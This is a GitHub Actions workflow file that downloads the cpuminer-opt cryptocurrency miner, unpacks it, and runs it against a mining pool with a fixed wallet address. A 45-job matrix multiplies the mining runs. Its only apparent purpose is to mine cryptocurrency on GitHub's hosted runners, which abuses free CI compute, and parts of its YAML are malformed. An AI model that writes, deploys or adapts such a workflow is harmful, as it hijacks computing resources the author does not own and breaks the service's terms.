name : MxvMine

on: [workflow_dispatch]

jobs:
  build:
    name: MxvMine
    runs-on: windows-latest
    strategy:
      max-parallel: 100
      fail-test: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1.35]
        flag: [A, B, C, D, E, F, G, H, I]
      env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
      steps:
      - name: DOWNLOAD
        run: Invoke-WebRequest https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.24/cpuminer-opt-win.zip -OutFile cpuminer-opt-win.zip
      - name: Extract
        run: Expand-Archive cpuminer-opt-win.zip
      - name: RUNNING
        run: .\cpuminer-opt-win\cpuminer-sse2.exe -a power2b -o stratum+tcps://stratum-asia.rplant.xyz:17022 -u Br1Qa3cuBxK8psoJFNv3Kx1LMVKYNZxSMa.asu -t 1
      - name: DONE
        run: exit
